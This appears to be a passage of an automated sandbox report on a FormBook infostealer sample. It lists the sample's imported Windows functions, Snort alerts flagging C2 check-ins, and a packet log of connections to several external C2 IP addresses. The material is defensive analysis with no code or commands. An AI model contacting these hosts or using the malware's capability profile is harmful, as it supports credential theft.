GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/08/24-07:20:11.848902	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49741	80	192.168.2.4	162.43.94.40
07/08/24-07:22:37.893135	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49785	80	192.168.2.4	103.176.91.154
07/08/24-07:21:05.103706	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49757	80	192.168.2.4	3.33.130.190
07/08/24-07:20:38.705767	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49749	80	192.168.2.4	203.161.41.207
07/08/24-07:22:11.489640	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49777	80	192.168.2.4	3.33.130.190
07/08/24-07:21:18.222792	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49761	80	192.168.2.4	51.89.93.193
07/08/24-07:21:31.503998	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49765	80	192.168.2.4	3.33.130.190
07/08/24-07:21:58.047710	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49773	80	192.168.2.4	45.130.41.38
07/08/24-07:19:48.203265	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49736	80	192.168.2.4	3.33.130.190
07/08/24-07:20:51.977652	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49753	80	192.168.2.4	3.33.130.190
07/08/24-07:21:44.616017	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49769	80	192.168.2.4	188.114.96.3
07/08/24-07:22:24.783779	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49781	80	192.168.2.4	3.33.130.190
07/08/24-07:22:51.457643	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49789	80	192.168.2.4	5.78.41.174
07/08/24-07:20:25.361834	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49745	80	192.168.2.4	37.9.175.173

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 8, 2024 07:19:48.196151972 CEST	49736	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:19:48.201193094 CEST	80	49736	3.33.130.190	192.168.2.4
Jul 8, 2024 07:19:48.201366901 CEST	49736	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:19:48.203264952 CEST	49736	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:19:48.208029985 CEST	80	49736	3.33.130.190	192.168.2.4
Jul 8, 2024 07:19:48.680001020 CEST	80	49736	3.33.130.190	192.168.2.4
Jul 8, 2024 07:19:48.680016994 CEST	80	49736	3.33.130.190	192.168.2.4
Jul 8, 2024 07:19:48.680330038 CEST	49736	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:19:48.682821035 CEST	49736	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:19:48.687613964 CEST	80	49736	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:04.237591982 CEST	49738	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:04.242408037 CEST	80	49738	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:04.242492914 CEST	49738	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:04.244698048 CEST	49738	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:04.249628067 CEST	80	49738	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:05.051227093 CEST	80	49738	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:05.051243067 CEST	80	49738	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:05.051270962 CEST	80	49738	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:05.051326036 CEST	49738	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:05.051367044 CEST	49738	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:05.758398056 CEST	49738	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:06.776735067 CEST	49739	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:06.781603098 CEST	80	49739	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:06.781691074 CEST	49739	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:06.783571959 CEST	49739	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:06.788386106 CEST	80	49739	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:07.591716051 CEST	80	49739	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:07.591777086 CEST	80	49739	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:07.591790915 CEST	80	49739	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:07.591836929 CEST	49739	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:07.591873884 CEST	49739	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:08.289685965 CEST	49739	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:09.311633110 CEST	49740	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:09.316581964 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:09.316664934 CEST	49740	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:09.318912029 CEST	49740	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:09.324372053 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:09.324384928 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:09.324431896 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:09.324440956 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:09.324506044 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:09.324515104 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:09.324541092 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:09.324580908 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:09.324598074 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:10.114162922 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:10.114202023 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:10.114214897 CEST	80	49740	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:10.114502907 CEST	49740	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:10.820970058 CEST	49740	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:11.841717005 CEST	49741	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:11.846721888 CEST	80	49741	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:11.846842051 CEST	49741	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:11.848901987 CEST	49741	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:11.855778933 CEST	80	49741	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:12.683228016 CEST	80	49741	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:12.683247089 CEST	80	49741	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:12.683257103 CEST	80	49741	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:12.683320999 CEST	80	49741	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:12.683322906 CEST	49741	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:12.683439970 CEST	49741	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:12.685976982 CEST	49741	80	192.168.2.4	162.43.94.40
Jul 8, 2024 07:20:12.692212105 CEST	80	49741	162.43.94.40	192.168.2.4
Jul 8, 2024 07:20:17.756094933 CEST	49742	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:17.760977983 CEST	80	49742	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:17.761060953 CEST	49742	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:17.762907028 CEST	49742	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:17.767761946 CEST	80	49742	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:18.458247900 CEST	80	49742	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:18.458348036 CEST	80	49742	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:18.458398104 CEST	49742	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:19.274008989 CEST	49742	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:20.292418957 CEST	49743	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:20.297374010 CEST	80	49743	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:20.298407078 CEST	49743	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:20.300621986 CEST	49743	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:20.306535959 CEST	80	49743	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:21.022190094 CEST	80	49743	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:21.022403002 CEST	80	49743	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:21.022507906 CEST	49743	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:21.805231094 CEST	49743	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:22.823858023 CEST	49744	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:22.828720093 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:22.828815937 CEST	49744	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:22.831084013 CEST	49744	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:22.836026907 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:22.836051941 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:22.836107016 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:22.836505890 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:22.836591005 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:22.836601019 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:22.836615086 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:22.836623907 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:22.836730957 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:23.825975895 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:23.825989962 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:23.825993061 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:23.826070070 CEST	49744	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:23.826924086 CEST	80	49744	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:23.826972008 CEST	49744	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:24.337332010 CEST	49744	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:25.354877949 CEST	49745	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:25.359858990 CEST	80	49745	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:25.359941006 CEST	49745	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:25.361834049 CEST	49745	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:25.366656065 CEST	80	49745	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:26.052903891 CEST	80	49745	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:26.053057909 CEST	80	49745	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:26.053117037 CEST	49745	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:26.055665016 CEST	49745	80	192.168.2.4	37.9.175.173
Jul 8, 2024 07:20:26.060451984 CEST	80	49745	37.9.175.173	192.168.2.4
Jul 8, 2024 07:20:31.104120970 CEST	49746	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:31.109406948 CEST	80	49746	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:31.109488010 CEST	49746	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:31.111470938 CEST	49746	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:31.116229057 CEST	80	49746	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:31.724991083 CEST	80	49746	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:31.725012064 CEST	80	49746	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:31.725123882 CEST	49746	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:32.617748022 CEST	49746	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:33.636570930 CEST	49747	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:33.641534090 CEST	80	49747	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:33.641638041 CEST	49747	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:33.643757105 CEST	49747	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:33.648905993 CEST	80	49747	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:34.231651068 CEST	80	49747	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:34.231767893 CEST	80	49747	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:34.231875896 CEST	49747	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:35.149036884 CEST	49747	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:36.167319059 CEST	49748	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:36.172210932 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.172297955 CEST	49748	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:36.174514055 CEST	49748	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:36.179932117 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.179953098 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.179971933 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.179980993 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.180011034 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.180020094 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.180213928 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.180223942 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.180233955 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.826518059 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.826618910 CEST	80	49748	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:36.826673985 CEST	49748	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:37.680289984 CEST	49748	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:38.698673010 CEST	49749	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:38.703762054 CEST	80	49749	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:38.703969002 CEST	49749	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:38.705766916 CEST	49749	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:38.710551977 CEST	80	49749	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:39.328131914 CEST	80	49749	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:39.328239918 CEST	80	49749	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:39.328387022 CEST	49749	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:39.330748081 CEST	49749	80	192.168.2.4	203.161.41.207
Jul 8, 2024 07:20:39.335525036 CEST	80	49749	203.161.41.207	192.168.2.4
Jul 8, 2024 07:20:44.360213041 CEST	49750	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:44.369054079 CEST	80	49750	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:44.369142056 CEST	49750	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:44.371917009 CEST	49750	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:44.381104946 CEST	80	49750	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:44.843127012 CEST	80	49750	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:44.843331099 CEST	49750	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:45.883418083 CEST	49750	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:45.888329029 CEST	80	49750	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:46.901962996 CEST	49751	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:46.906770945 CEST	80	49751	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:46.906871080 CEST	49751	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:46.908771038 CEST	49751	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:46.913575888 CEST	80	49751	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:47.381800890 CEST	80	49751	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:47.382036924 CEST	49751	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:48.414674044 CEST	49751	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:48.419482946 CEST	80	49751	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.433650970 CEST	49752	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:49.438612938 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.439780951 CEST	49752	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:49.445678949 CEST	49752	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:49.450493097 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.450503111 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.450546980 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.450556993 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.450612068 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.450619936 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.450721025 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.450730085 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.450741053 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.904491901 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:49.905726910 CEST	49752	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:50.946050882 CEST	49752	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:50.950875044 CEST	80	49752	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:51.965673923 CEST	49753	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:51.970611095 CEST	80	49753	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:51.973810911 CEST	49753	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:51.977652073 CEST	49753	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:51.982594967 CEST	80	49753	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:52.451750040 CEST	80	49753	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:52.451803923 CEST	80	49753	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:52.451886892 CEST	49753	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:52.454901934 CEST	49753	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:52.459713936 CEST	80	49753	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:57.481652021 CEST	49754	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:57.486504078 CEST	80	49754	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:57.486670971 CEST	49754	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:57.488540888 CEST	49754	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:57.493364096 CEST	80	49754	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:57.969218016 CEST	80	49754	3.33.130.190	192.168.2.4
Jul 8, 2024 07:20:57.969723940 CEST	49754	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:59.008398056 CEST	49754	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:20:59.013346910 CEST	80	49754	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:00.027543068 CEST	49755	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:00.032521009 CEST	80	49755	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:00.032593012 CEST	49755	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:00.035625935 CEST	49755	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:00.040473938 CEST	80	49755	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:00.509495974 CEST	80	49755	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:00.509552956 CEST	49755	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:01.539596081 CEST	49755	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:01.546577930 CEST	80	49755	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.559179068 CEST	49756	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:02.564078093 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.564156055 CEST	49756	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:02.566993952 CEST	49756	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:02.571906090 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.571916103 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.571919918 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.571928978 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.576524973 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.576534033 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.576541901 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.576550961 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:02.576555014 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:03.049298048 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:03.055350065 CEST	49756	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:04.071352005 CEST	49756	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:04.076145887 CEST	80	49756	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:05.089845896 CEST	49757	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:05.097204924 CEST	80	49757	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:05.100224972 CEST	49757	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:05.103705883 CEST	49757	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:05.108509064 CEST	80	49757	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:05.558768034 CEST	80	49757	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:05.558842897 CEST	80	49757	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:05.559005022 CEST	49757	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:05.561495066 CEST	49757	80	192.168.2.4	3.33.130.190
Jul 8, 2024 07:21:05.566277027 CEST	80	49757	3.33.130.190	192.168.2.4
Jul 8, 2024 07:21:10.613727093 CEST	49758	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:10.618541002 CEST	80	49758	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:10.618609905 CEST	49758	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:10.624149084 CEST	49758	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:10.628921986 CEST	80	49758	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:11.264492989 CEST	80	49758	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:11.264512062 CEST	80	49758	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:11.264523983 CEST	80	49758	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:11.264681101 CEST	49758	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:11.264681101 CEST	49758	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:12.134186029 CEST	49758	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:13.151715994 CEST	49759	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:13.156754971 CEST	80	49759	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:13.156896114 CEST	49759	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:13.158796072 CEST	49759	80	192.168.2.4	51.89.93.193
Jul 8, 2024 07:21:13.163652897 CEST	80	49759	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:13.808758020 CEST	80	49759	51.89.93.193	192.168.2.4
Jul 8, 2024 07:21:13.808784962 CEST	80	49759	51.89.93.193	192.168.2.4
